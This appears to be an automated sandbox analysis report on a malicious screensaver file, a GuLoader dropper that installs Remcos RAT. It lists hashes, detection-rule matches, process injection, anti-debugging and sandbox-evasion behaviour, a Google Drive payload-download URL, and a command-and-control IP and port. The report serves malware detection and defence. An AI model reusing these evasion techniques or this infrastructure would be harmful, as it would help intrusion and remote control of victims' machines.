Play interactive tour

Edit tour

Analysis Report Scan_order.scr

Overview

General Information

Sample Name:	Scan_order.scr (renamed file extension from scr to exe)
Analysis ID:	337854
MD5:	04be7ed51e345a56403df4657b376990
SHA1:	44f5fdf6902d114524afc110cd927f95f72903fa
SHA256:	ab77af2c0fe4a39b3e2ec7b7450ef36999baf7c66316f4b3934d5a60e124d50c
Tags:	GuLoaderRemcosRATscr
Most interesting Screenshot:
Errors Sigma syntax error: Has an empty selector, Rule: Abusing Azure Browser SSO

Detection

Remcos GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Remcos

Yara detected GuLoader

Connects to many ports of the same IP (likely port scanning)

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Scan_order.exe (PID: 5260 cmdline: 'C:\Users\user\Desktop\Scan_order.exe' MD5: 04BE7ED51E345A56403DF4657B376990)

ieinstal.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Scan_order.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 6128 cmdline: 'C:\Users\user\Desktop\Scan_order.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)

wscript.exe (PID: 5776 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\uninstall.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.204159990.000000000040A000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0xf40:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0xf40:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: ieinstal.exe PID: 6128	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: Scan_order.exe PID: 5260	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security

Sigma Overview

System Summary:

Sigma detected: Remcos

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, ProcessId: 6128, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: Scan_order.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 172.217.23.1:443 -> 192.168.2.3:49754 version: TLS 1.2

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.157.161.61 ports 0,2,52360,3,5,6

Source: global traffic

TCP traffic: 192.168.2.3:49755 -> 185.157.161.61:52360

Source: Joe Sandbox View

IP Address: 172.217.23.1 172.217.23.1

Source: Joe Sandbox View

ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-0c-8c-docs.googleusercontent.com

Source: ieinstal.exe

String found in binary or memory: https://drive.google.com/uc?export=download&id=1LZsqqMCLui4uAjpAqMIbGbmi-9F8VM3f

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443

Source: unknown

HTTPS traffic detected: 172.217.23.1:443 -> 192.168.2.3:49754 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000000.204159990.000000000040A000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Scan_order.exe

Source: C:\Users\user\Desktop\Scan_order.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5B11 NtProtectVirtualMemory,	0_2_021C5B11
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C29E9 NtWriteVirtualMemory,Sleep,	0_2_021C29E9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5F53 NtResumeThread,	0_2_021C5F53
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C0549 EnumWindows,NtSetInformationThread,	0_2_021C0549
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6205 NtResumeThread,	0_2_021C6205
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2AB9 NtWriteVirtualMemory,	0_2_021C2AB9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5AA6 NtProtectVirtualMemory,	0_2_021C5AA6
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C231C NtWriteVirtualMemory,	0_2_021C231C
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C236C NtWriteVirtualMemory,	0_2_021C236C
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2369 NtWriteVirtualMemory,	0_2_021C2369
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2390 NtWriteVirtualMemory,	0_2_021C2390
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C23C9 NtWriteVirtualMemory,	0_2_021C23C9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C23F9 NtWriteVirtualMemory,	0_2_021C23F9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6001 NtResumeThread,	0_2_021C6001
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6031 NtResumeThread,	0_2_021C6031
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C602D NtResumeThread,	0_2_021C602D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1021 NtWriteVirtualMemory,	0_2_021C1021
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C604A NtResumeThread,	0_2_021C604A
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6065 NtResumeThread,	0_2_021C6065
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6091 NtResumeThread,	0_2_021C6091
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C60BD NtResumeThread,	0_2_021C60BD
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C60D9 NtResumeThread,	0_2_021C60D9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6135 NtResumeThread,	0_2_021C6135
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6129 NtResumeThread,	0_2_021C6129
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6177 NtResumeThread,	0_2_021C6177
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6160 NtResumeThread,	0_2_021C6160
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C6198 NtResumeThread,	0_2_021C6198
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C61BD NtResumeThread,	0_2_021C61BD
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C51CF NtWriteVirtualMemory,	0_2_021C51CF
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C61C5 NtResumeThread,	0_2_021C61C5
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C61F1 NtResumeThread,	0_2_021C61F1
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C0614 NtSetInformationThread,	0_2_021C0614
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C063D NtSetInformationThread,	0_2_021C063D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1E2D NtWriteVirtualMemory,	0_2_021C1E2D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C26A7 NtWriteVirtualMemory,	0_2_021C26A7
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C26D4 NtWriteVirtualMemory,	0_2_021C26D4
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C272D NtWriteVirtualMemory,	0_2_021C272D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C274B NtWriteVirtualMemory,	0_2_021C274B
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5F68 NtResumeThread,	0_2_021C5F68
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5F93 NtResumeThread,	0_2_021C5F93
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FB9 NtResumeThread,	0_2_021C5FB9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FA9 NtResumeThread,	0_2_021C5FA9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FAB NtResumeThread,	0_2_021C5FAB
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FC1 NtResumeThread,	0_2_021C5FC1
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FC3 NtResumeThread,	0_2_021C5FC3
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FED NtResumeThread,	0_2_021C5FED
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5FEF NtResumeThread,	0_2_021C5FEF
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C241D NtWriteVirtualMemory,	0_2_021C241D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2461 NtWriteVirtualMemory,	0_2_021C2461
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2495 NtWriteVirtualMemory,	0_2_021C2495
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C24BE NtWriteVirtualMemory,	0_2_021C24BE
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2CC8 NtWriteVirtualMemory,	0_2_021C2CC8
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2514 NtWriteVirtualMemory,	0_2_021C2514
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C550F NtWriteVirtualMemory,LoadLibraryA,	0_2_021C550F
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C253D NtWriteVirtualMemory,	0_2_021C253D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2539 NtWriteVirtualMemory,	0_2_021C2539
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C05B5 NtSetInformationThread,	0_2_021C05B5
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C25A9 NtWriteVirtualMemory,	0_2_021C25A9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C25AB NtWriteVirtualMemory,	0_2_021C25AB
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C05D9 NtSetInformationThread,	0_2_021C05D9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C25F7 NtWriteVirtualMemory,	0_2_021C25F7
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C35E9 NtSetInformationThread,	0_2_021C35E9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D5B11 NtProtectVirtualMemory,	25_2_032D5B11
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D5AA6 NtProtectVirtualMemory,	25_2_032D5AA6

Source: C:\Users\user\Desktop\Scan_order.exe

Code function: 0_2_004027ED

0_2_004027ED

Source: Scan_order.exe, 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUNFUGI.exe vs Scan_order.exe
Source: Scan_order.exe	Binary or memory string: OriginalFilenameUNFUGI.exe vs Scan_order.exe

Source: Scan_order.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000000.204159990.000000000040A000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@2/2

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-DPTVOE

Source: C:\Users\user\Desktop\Scan_order.exe

File created: C:\Users\user\AppData\Local\Temp\~DFFCC5FEF3BD8D5BCE.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\uninstall.vbs'

Source: Scan_order.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Scan_order.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Scan_order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Scan_order.exe 'C:\Users\user\Desktop\Scan_order.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\Scan_order.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\Scan_order.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\uninstall.vbs'
Source: C:\Users\user\Desktop\Scan_order.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\Scan_order.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Scan_order.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\Scan_order.exe'	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\uninstall.vbs'	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ieinstal.exe PID: 6128, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: Scan_order.exe PID: 5260, type: MEMORY

Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_0040481C push ebx; ret	0_2_0040481D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00408422 push ecx; retf	0_2_00408423
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_0040403A push eax; ret	0_2_0040403B
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_004054C9 push esp; iretd	0_2_0040555C
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00408C9A push ecx; retf	0_2_00408CAF
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_0040414A push ECE29E81h; ret	0_2_0040414F
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_0040416C push EDC16208h; ret	0_2_00404173
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00408504 push eax; ret	0_2_00408527
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00406D10 push ebx; ret	0_2_00406D11
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00406A43 push esp; iretd	0_2_00406A44
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00406647 push edx; retn 0006h	0_2_00406648
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00402AF4 push cs; iretd	0_2_00402AF5
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_004086FD push 6DCDEB08h; retf	0_2_0040872B
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_004082A2 push ecx; retf	0_2_00408303
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00405AB6 push A8FAEB08h; iretd	0_2_00405ABB
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_0040830C push ecx; retf	0_2_00408303
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00408B2A push ecx; retf	0_2_00408B5F
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_00405FCA push eax; retf	0_2_00405FCB
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_0040CFAE pushfd ; iretd	0_2_0040CFCD
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C4AA1 push 89F538D8h; ret	0_2_021C4AB4
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C4AE9 push 89F538D8h; ret	0_2_021C4AB4
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C3BF8 push cs; retf	0_2_021C3BF9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C13F7 push 38C2EBD8h; retf	0_2_021C1408
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C46DF push 85C2EBD8h; retf	0_2_021C46F0
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C57B9 push eax; ret	0_2_021C57D5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D3737 push DDE8C938h; iretd	25_2_032D373C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D57B9 push eax; ret	25_2_032D57D5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D4AA1 push 89F538D8h; ret	25_2_032D4AB4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D4AE9 push 89F538D8h; ret	25_2_032D4AB4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D46DF push 85C2EBD8h; retf	25_2_032D46F0

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Scan_order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe

Code function: 0_2_021C1E2D NtWriteVirtualMemory,

0_2_021C1E2D

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe	RDTSC instruction interceptor: First address: 00000000021C06BD second address: 00000000021C06BD instructions:
Source: C:\Users\user\Desktop\Scan_order.exe	RDTSC instruction interceptor: First address: 00000000021C35DA second address: 00000000021C35DA instructions:
Source: C:\Users\user\Desktop\Scan_order.exe	RDTSC instruction interceptor: First address: 00000000021C603E second address: 00000000021C603E instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Scan_order.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Scan_order.exe, ieinstal.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe	RDTSC instruction interceptor: First address: 00000000021C06BD second address: 00000000021C06BD instructions:
Source: C:\Users\user\Desktop\Scan_order.exe	RDTSC instruction interceptor: First address: 00000000021C35DA second address: 00000000021C35DA instructions:
Source: C:\Users\user\Desktop\Scan_order.exe	RDTSC instruction interceptor: First address: 00000000021C603E second address: 00000000021C603E instructions:

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\Scan_order.exe

Code function: 0_2_021C29E9 rdtsc

0_2_021C29E9

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 3636	Thread sleep count: 252 > 30			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 3636	Thread sleep time: -2520000s >= -30000s			Jump to behavior

Source: Scan_order.exe, ieinstal.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe

Code function: 0_2_021C0549 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?

0_2_021C0549

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\Scan_order.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Scan_order.exe

Code function: 0_2_021C29E9 rdtsc

0_2_021C29E9

Source: C:\Users\user\Desktop\Scan_order.exe

Code function: 0_2_021C36F0 LdrInitializeThunk,

0_2_021C36F0

Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_004027ED mov ebx, dword ptr fs:[00000030h]	0_2_004027ED
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C2B29 mov eax, dword ptr fs:[00000030h]	0_2_021C2B29
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1E2D mov eax, dword ptr fs:[00000030h]	0_2_021C1E2D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1E40 mov eax, dword ptr fs:[00000030h]	0_2_021C1E40
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1E7D mov eax, dword ptr fs:[00000030h]	0_2_021C1E7D
